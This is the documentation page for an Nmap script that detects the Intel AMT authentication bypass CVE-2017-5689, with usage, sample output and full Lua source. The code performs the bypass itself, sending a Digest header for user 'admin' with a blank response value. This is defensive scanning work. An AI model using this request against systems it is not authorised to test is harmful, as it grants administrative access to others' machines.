<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-vuln-cve2017-5689</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Andrew Orr<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5689.nse">https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5689.nse</a><br/>
<h3>Summary</h3>
<p>Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075 privilege escalation vulnerability (CVE2017-5689).</p>
<p>This script determines if a target is vulnerable by attempting to perform digest authentication with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received.</p>
<p>References:</p>
<ul>
<li><a href="https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability" target=_blank>https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -p 16992 --script http-vuln-cve2017-5689 &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT      STATE SERVICE       REASON
16992/tcp open  amt-soap-http syn-ack
| http-vuln-cve2017-5689:
|   VULNERABLE:
|   Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5689  BID:98269
|     Risk factor: High  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
|       Intel Active Management Technology is vulnerable to an authentication bypass that
|       can be exploited by performing digest authentication and sending a blank response
|       digest parameter.
|
|     Disclosure date: 2017-05-01
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
|       https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr
|       http://www.securityfocus.com/bid/98269
|       https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
|       https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
|_      https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
<li><a href="nmap/libraries/rand.htm">rand</a></li>
</ul>
<h3>Code</h3>
<pre>description = [[
Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075
privilege escalation vulnerability (CVE2017-5689).

This script determines if a target is vulnerable by attempting to perform digest authentication
with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received.

References:
* https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
]]

local string = require &quot;string&quot;
local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local vulns = require &quot;vulns&quot;
local rand = require &quot;rand&quot;

---
-- @usage
-- nmap -p 16992 --script http-vuln-cve2017-5689 &lt;target&gt;
--
-- @output
-- PORT      STATE SERVICE       REASON
-- 16992/tcp open  amt-soap-http syn-ack
-- | http-vuln-cve2017-5689:
-- |   VULNERABLE:
-- |   Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2017-5689  BID:98269
-- |     Risk factor: High  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
-- |       Intel Active Management Technology is vulnerable to an authentication bypass that
-- |       can be exploited by performing digest authentication and sending a blank response
-- |       digest parameter.
-- |
-- |     Disclosure date: 2017-05-01
-- |     References:
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
-- |       https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr
-- |       http://www.securityfocus.com/bid/98269
-- |       https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
-- |       https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
-- |_      https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
--
-- @xmloutput
-- &lt;table key=&quot;CVE-2017-5689&quot;&gt;
-- &lt;elem key=&quot;title&quot;&gt;Intel Active Management Technology INTEL-SA-00075 Authentication Bypass&lt;/elem&gt;
-- &lt;elem key=&quot;state&quot;&gt;VULNERABLE&lt;/elem&gt;
-- &lt;table key=&quot;ids&quot;&gt;
-- &lt;elem&gt;CVE:CVE-2017-5689&lt;/elem&gt;
-- &lt;elem&gt;BID:98269&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;table key=&quot;scores&quot;&gt;
-- &lt;elem key=&quot;CVSSv2&quot;&gt;10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;table key=&quot;description&quot;&gt;
-- &lt;elem&gt;Intel Active Management Technology is vulnerable to an authentication bypass that&amp;#xa;can be
-- exploited by performing digest authentication and sending a blank response&amp;#xa;digest parameter.&amp;#xa;
-- &lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;table key=&quot;dates&quot;&gt;
-- &lt;table key=&quot;disclosure&quot;&gt;
-- &lt;elem key=&quot;month&quot;&gt;05&lt;/elem&gt;
-- &lt;elem key=&quot;day&quot;&gt;01&lt;/elem&gt;
-- &lt;elem key=&quot;year&quot;&gt;2017&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;/table&gt;
-- &lt;elem key=&quot;disclosure&quot;&gt;2017-05-01&lt;/elem&gt;
-- &lt;table key=&quot;refs&quot;&gt;
-- &lt;elem&gt;https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;amp;languageid=en-fr&lt;/elem&gt;
-- &lt;elem&gt;https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf&lt;/elem&gt;
-- &lt;elem&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689&lt;/elem&gt;
-- &lt;elem&gt;https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability&lt;/elem&gt;
-- &lt;elem&gt;https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability&lt;/elem&gt;
-- &lt;elem&gt;http://www.securityfocus.com/bid/98269&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;/table&gt;
---

author = &quot;Andrew Orr&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = { &quot;vuln&quot;, &quot;auth&quot;, &quot;exploit&quot; }

portrule = shortport.port_or_service({623, 664, 16992, 16993}, &quot;amt-soap-http&quot;)

action = function(host, port)
  local vuln = {
    title = &quot;Intel Active Management Technology INTEL-SA-00075 Authentication Bypass&quot;,
    state = vulns.STATE.NOT_VULN,
    risk_factor = &quot;High&quot;,
    scores = {
      CVSSv2 = &quot;10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)&quot;,
    },
    description = [[
Intel Active Management Technology is vulnerable to an authentication bypass that
can be exploited by performing digest authentication and sending a blank response
digest parameter.
    ]],
    IDS = {CVE = &quot;CVE-2017-5689&quot;, BID = &quot;98269&quot;},
    references = {
      &#39;https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr&#39;,
      &#39;https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability&#39;,
      &#39;https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf&#39;,
      &#39;https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability&#39;
    },
    dates = { disclosure = { year = &#39;2017&#39;, month = &#39;05&#39;, day = &#39;01&#39; } }
  }

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local response = http.get(host, port, &#39;/index.htm&#39;)

  if response.header[&#39;server&#39;] and response.header[&#39;server&#39;]:find(&#39;Intel(R)&#39;, 1, true)
    and response.status and response.status == 401 then
      local www_authenticate = http.parse_www_authenticate(response.header[&#39;www-authenticate&#39;])
      if www_authenticate[1][&#39;params&#39;] and www_authenticate[1][&#39;params&#39;][&#39;realm&#39;] and www_authenticate[1][&#39;params&#39;][&#39;nonce&#39;] then
        local auth_header = string.format(&quot;Digest username=\&quot;admin\&quot;, realm=\&quot;%s\&quot;, nonce=\&quot;%s\&quot;, uri=\&quot;index.htm\&quot;,&quot; ..
          &quot;cnonce=\&quot;%s\&quot;, nc=1, qop=\&quot;auth\&quot;, response=\&quot;\&quot;&quot;, www_authenticate[1][&#39;params&#39;][&#39;realm&#39;],
          www_authenticate[1][&#39;params&#39;][&#39;nonce&#39;], rand.random_alpha(10))
        local opt = { header = { [&#39;Authorization&#39;] = auth_header } }
        response = http.get(host, port, &#39;/index.htm&#39;, opt)
        if response.status and response.status == 200 then
          vuln.state = vulns.STATE.VULN
        end
      end
  end

  return vuln_report:make_output(vuln)
end</pre>
